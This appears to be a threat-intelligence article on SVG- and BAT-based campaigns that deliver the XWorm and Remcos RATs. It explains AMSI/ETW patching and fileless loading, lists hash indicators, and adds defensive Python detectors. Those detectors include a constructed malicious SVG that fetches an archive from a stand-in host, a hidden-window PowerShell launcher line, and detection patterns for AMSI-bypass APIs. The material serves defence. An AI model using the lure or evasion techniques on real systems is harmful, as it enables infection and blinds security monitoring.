Malware Campaign Uses SVG Email Attachments to Deploy XWorm and Remcos RAT


Recent threat campaigns have revealed an evolving use of BAT-based loaders to deliver Remote Access Trojans (RATs), including XWorm and Remcos.

These campaigns typically begin with a ZIP archive, often hosted on a seemingly legitimate platform such as ImgKit, that mimics benign content to entice the user into opening it. The archive contains a heavily obfuscated BAT script that orchestrates the rest of the infection chain.

The obfuscation is applied in multiple layers specifically to defeat static detection engines, which see only the BAT text and not the PowerShell it eventually produces.

When executed, the script launches a PowerShell loader that injects the RAT payload directly into memory. The RAT itself is never written to disk as a file, so endpoint defenses that rely on scanning files have nothing to inspect.

Security researchers have documented two primary delivery methods: the ZIP arriving as an attachment inside an EML file, and a URL pointing to the copy hosted on ImgKit.

The use of more than one distribution channel suggests the threat actors are iterating on their delivery tactics to maximize infection rates.

The BAT script also establishes persistence by planting a copy of itself in the user's Windows Startup folder, so the loader runs again at every logon of that user.

This simple mechanism complements the fileless injection model: the only artifact on disk is an obfuscated batch file in a location most users never look at, while the payload it stages exists only in memory, which makes detection and remediation more challenging.

A notable advancement in the second campaign ("Campaign 2") is the adoption of SVG (Scalable Vector Graphics) files as the initial access vector.

Embedded within these SVGs is JavaScript that triggers the download of the same ZIP archive used in the first campaign.

SVG is an XML format, and a browser that opens an SVG file as a document will execute any <script> elements and on* event handlers it contains, exactly as it would for an HTML page. When the attachment is opened in a browser or rendered inside a phishing page, the script therefore starts the download without any further prompt, effectively weaponizing a file type that users and filters treat as a harmless image. (Scripts in an SVG do not run when the image is merely referenced through an <img> tag, so the lure depends on the victim opening the file itself.)

By relying on the scripting capabilities of SVG, attackers slip past perimeter defenses that exclude image formats from deep content inspection.
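The following is an added example, not code from the article or from the campaign: a static inspector in Python that flags the active-content features an SVG can carry (script elements, on* event handlers, javascript:/data: hrefs, embedded foreign documents) so that a mail gateway or an analyst can treat such files as scripts rather than images. The two SVG samples, the function names and the example.invalid URL are constructed for the demonstration and are not indicators from the campaign.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples (not from the campaign): a plain icon and an SVG whose
# script redirects the viewer to an archive download when the file is opened.
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
  <circle cx="32" cy="32" r="30" fill="#3a7"/>
</svg>"""

MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="400" height="300" onload="init()">
  <text x="20" y="40">Invoice preview</text>
  <script type="text/javascript"><![CDATA[
    function init() {
      // hypothetical download URL for the demo, not an indicator from the article
      window.location = "https://example.invalid/Invoice.zip";
    }
  ]]></script>
  <a xlink:href="javascript:init()"><rect width="400" height="300" fill="none"/></a>
</svg>"""

# Raw pre-check so a deliberately malformed file still trips the script test.
SCRIPT_TAG = re.compile(rb"<\s*script\b", re.IGNORECASE)
# URL schemes that execute or embed content instead of referencing a resource.
ACTIVE_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(name: str) -> str:
    """Strip the XML namespace from an element or attribute name."""
    return name.rsplit("}", 1)[-1].lower()


def inspect_svg(data: bytes):
    """Return a list of (finding, detail) tuples describing active content."""
    findings = []
    if SCRIPT_TAG.search(data):
        findings.append(("script_element", "raw <script> tag present"))
    try:
        # For untrusted input in production use defusedxml instead of ElementTree.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        findings.append(("unparseable", f"XML parse error: {exc}"))
        return findings
    for el in root.iter():
        name = _local(el.tag)
        if name in ("foreignobject", "iframe", "embed", "object"):
            findings.append(("embedded_document", f"<{name}> element"))
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):
                findings.append(("event_handler", f"<{name} {a}=...>"))
            elif a == "href" and value.strip().lower().startswith(ACTIVE_SCHEMES):
                findings.append(("active_href", f"<{name} {attr}={value[:40]}>"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """Policy: any active-content finding means the SVG is not a plain image."""
    return bool(inspect_svg(data))
```

On the constructed malicious sample inspect_svg reports script_element, event_handler and active_href, while the plain icon yields nothing. A gateway that applies is_suspicious to every SVG attachment, regardless of the declared image MIME type, closes the gap the article describes.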

Infection Chain.

Once the ZIP archive is in place, the infection chain mirrors that of Campaign 1: execution of the obfuscated BAT loader, in-memory PowerShell injection, and eventual deployment of the RAT payload.

PowerShell Injection and Evasion

The PowerShell loader itself is a two-stage script delivered as a Base64-encoded command-line argument.

The first stage locates and decodes Base64 data embedded as a comment in a BAT file within the user's profile directory.

Upon decoding, the script uses .NET reflection and dynamic delegates to patch two Windows defenses in the memory of its own process: the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW).

By overwriting the entry points of AmsiScanBuffer and EtwEventWrite with no-op instructions, the loader disables script scanning and ETW event emission for that PowerShell process, so the stages that follow are neither inspected by the installed antivirus engine nor recorded by ETW-based telemetry. The patch is in-process only; events emitted before the patch, and telemetry collected outside the process, are unaffected.

The second stage extracts two encrypted .NET assemblies from the same BAT file. Each is Base64-decoded, AES-decrypted with a key and IV hardcoded in the script, and then GZIP-decompressed.

Process window of PowerShell with the PS script passed as an argument.

Loaded directly into memory via Assembly.Load, the first assembly executes immediately, while the second receives simulated command-line arguments to unleash its full functionality—most critically, launching XWorm or Remcos.
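As an added example (not the loader's code and not from the article), the Python below reproduces the analyst-side view of the chain just described: it pulls Base64 blobs out of BAT comment lines (:: or REM), strips the GZIP layer, and reports which loader behaviours the recovered PowerShell references. The INDICATORS labels, the STAGE_PS stand-in script and the sample BAT are constructed for the demonstration; the AES layer the article describes is not modelled because its key and IV are sample-specific, and decode_encoded_command is included for the -EncodedCommand (UTF-16LE Base64) form that a Base64 PowerShell argument usually takes.

```python
import base64
import gzip
import re

# Strings a practitioner expects in this loader family's PowerShell: AMSI/ETW
# patching through reflection, in-memory assembly loading, and the
# decode/decrypt/decompress chain. The labels on the left are our own.
INDICATORS = {
    "amsi_patch":     re.compile(r"AmsiScanBuffer|amsiInitFailed", re.I),
    "etw_patch":      re.compile(r"EtwEventWrite", re.I),
    "reflection_api": re.compile(r"GetProcAddress|GetDelegateForFunctionPointer|VirtualProtect", re.I),
    "inmemory_load":  re.compile(r"Assembly\]::Load\b|\[Reflection\.Assembly\]", re.I),
    "unpack_chain":   re.compile(r"FromBase64String|GZipStream|AesCryptoServiceProvider|\.Aes\]::Create", re.I),
}

# A BAT comment line (:: or REM) whose only content is a long Base64 run.
COMMENT_B64 = re.compile(r"^\s*(?:::|rem\s)\s*([A-Za-z0-9+/=]{64,})\s*$", re.I | re.M)


def decode_encoded_command(arg: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text)."""
    return base64.b64decode(arg).decode("utf-16-le")


def extract_comment_blobs(bat_text: str):
    """Return the decoded Base64 blobs hidden in BAT comment lines."""
    blobs = []
    for b64 in COMMENT_B64.findall(bat_text):
        try:
            blobs.append(base64.b64decode(b64, validate=True))
        except ValueError:  # binascii.Error is a ValueError
            continue
    return blobs


def unwrap(blob: bytes) -> bytes:
    """Strip a GZIP layer if present (in the real chain AES decryption comes first)."""
    return gzip.decompress(blob) if blob[:2] == b"\x1f\x8b" else blob


def scan_script(text: str):
    """Sorted list of indicator labels whose pattern appears in the script."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def triage(bat_text: str):
    """Decode hidden blobs and report which loader indicators they contain."""
    report = {"blobs": 0, "indicators": set()}
    for blob in extract_comment_blobs(bat_text):
        report["blobs"] += 1
        payload = unwrap(blob).decode("utf-8", errors="replace")
        report["indicators"].update(scan_script(payload))
    report["indicators"] = sorted(report["indicators"])
    return report


# Constructed sample: an inert stand-in for the stage script (it only names the
# APIs; it patches nothing) that a BAT file carries as gzip+Base64 in a comment.
STAGE_PS = """
$p = [Win32]::GetProcAddress([Win32]::LoadLibrary('amsi.dll'), 'AmsiScanBuffer')
[Win32]::VirtualProtect($p, 6, 0x40, [ref]0)
$e = [Win32]::GetProcAddress([Win32]::LoadLibrary('ntdll.dll'), 'EtwEventWrite')
$raw = [Convert]::FromBase64String($blob)
$gz = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @(,[string[]]@()))
"""


def build_sample_bat() -> str:
    """Constructed BAT file: normal lines plus one comment line carrying the stage."""
    encoded = base64.b64encode(gzip.compress(STAGE_PS.encode(), mtime=0)).decode()
    return "\r\n".join([
        "@echo off",
        "set \"x=%~dp0\"",
        ":: " + encoded,
        "powershell -nop -w hidden -c \"...\"",  # placeholder launcher line
    ])
```

Running triage(build_sample_bat()) reports one blob and all five indicator labels; a clean batch file reports none. The comment-line regex is deliberately strict (a whole line of Base64 of at least 64 characters) so that ordinary REM text does not produce false hits, and the scan works on the decoded stage rather than the BAT text, which is the point of the obfuscation the article describes.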

Loader Capabilities and Final Payload

Multiple loader variants have been identified. Some load .NET executables as described above; others decrypt shellcode, make its memory region executable with VirtualProtect, and call into it through a delegate created via Marshal.

Regardless of variant, their common objectives are the same: evade detection, disable logging, load payloads in memory, and achieve persistence.

XWorm and Remcos, the final payloads, are widely used commodity RATs. Both support keylogging, remote command execution, file manipulation, screenshot capture, and data exfiltration.

Combined with the stealthy loader techniques and the non-traditional delivery formats, these campaigns illustrate the broader trend toward fileless malware, script obfuscation, and lures in file types that filters do not treat as executable.

Defenders should rely on behavioral detection, enforce content inspection for all file types, including SVG, which should be handled as active content (it can embed script) rather than as an image, and reinforce user awareness training to spot suspicious attachments and links.

Endpoint protection must monitor in-memory execution and anomalous PowerShell activity. Base64-encoded PowerShell command lines, Assembly.Load calls from script, and a PowerShell process whose AMSI and ETW telemetry go quiet shortly after it starts are all observable signals in these campaigns.

Indicators of Compromise 

MD5 hashes reported for the campaign, with file type and family as given by the researchers:

MD5 Hash                            File Type   Malware/Family
EDA018A9D51F3B09C20E88A15F630DF5    File        Unknown
23E30938E00F89BF345C9C1E58A6CC1D    BAT         Unknown
1CE36351D7175E9244209AE0D42759D9    JS          Unknown
EC04BC20CA447556C3BDCFCBF6662C60    LOADER      Unknown
D439CB98CF44D359C6ABCDDDB6E85454    XWorm       Remote Access Trojan (RAT)
[Not Provided]                      REMCOS      Remote Control Malware (RAT)
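An added example (our own, not the article's) that covers both the Startup-folder persistence described earlier and the IoC table above: it enumerates the per-user and all-users Windows Startup folders, hashes every file with MD5, flags script and executable types that should not normally live there, and matches the digests against the hashes the article lists. startup_folders() uses the standard Windows locations; demo() builds a throwaway folder with constructed files so the scan can be exercised on any platform.

```python
import hashlib
import os
import tempfile

# MD5 values from the article's IoC table (the REMCOS hash is not provided there).
IOC_MD5 = {
    "eda018a9d51f3b09c20e88a15f630df5": "File (unknown)",
    "23e30938e00f89bf345c9c1e58a6cc1d": "BAT",
    "1ce36351d7175e9244209ae0d42759d9": "JS",
    "ec04bc20ca447556c3bdcfcbf6662c60": "LOADER",
    "d439cb98cf44d359c6abcdddb6e85454": "XWorm",
}

# Extensions that should not normally sit in a Startup folder.
SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".js", ".jse", ".wsf", ".ps1", ".hta", ".exe", ".scr", ".lnk"}


def startup_folders():
    """Per-user and all-users Startup paths on Windows (empty list elsewhere)."""
    rel = r"Microsoft\Windows\Start Menu\Programs\Startup"
    out = []
    for env in ("APPDATA", "PROGRAMDATA"):
        base = os.environ.get(env)
        if base:
            out.append(os.path.join(base, rel))
    return out


def md5_of_file(path: str) -> str:
    """Lower-case hex MD5 of a file, read in chunks."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_startup(folders):
    """One record per file: path, hash, script-like extension, IoC match (or None)."""
    records = []
    for folder in folders:
        if not os.path.isdir(folder):
            continue
        for name in sorted(os.listdir(folder)):
            path = os.path.join(folder, name)
            if not os.path.isfile(path):
                continue
            digest = md5_of_file(path)
            records.append({
                "path": path,
                "md5": digest,
                "script_like": os.path.splitext(name)[1].lower() in SCRIPT_EXT,
                "ioc": IOC_MD5.get(digest),
            })
    return records


def demo():
    """Constructed Startup folder: a desktop.ini-style file and a dropped BAT."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "desktop.ini"), "w") as f:
            f.write("[.ShellClassInfo]\n")
        with open(os.path.join(d, "update.bat"), "w") as f:
            f.write("@echo off\r\n:: ...\r\n")
        return scan_startup([d])


if __name__ == "__main__":
    for rec in scan_startup(startup_folders()) or demo():
        print(rec)
```

On a live Windows host, scan_startup(startup_folders()) lists every file in both Startup folders; any record with script_like set deserves a look, and a non-empty ioc field is a direct match against the article's hashes. Hash matching is the weakest part of the check because the BAT is obfuscated per build, so the extension flag is the one to act on.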




About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.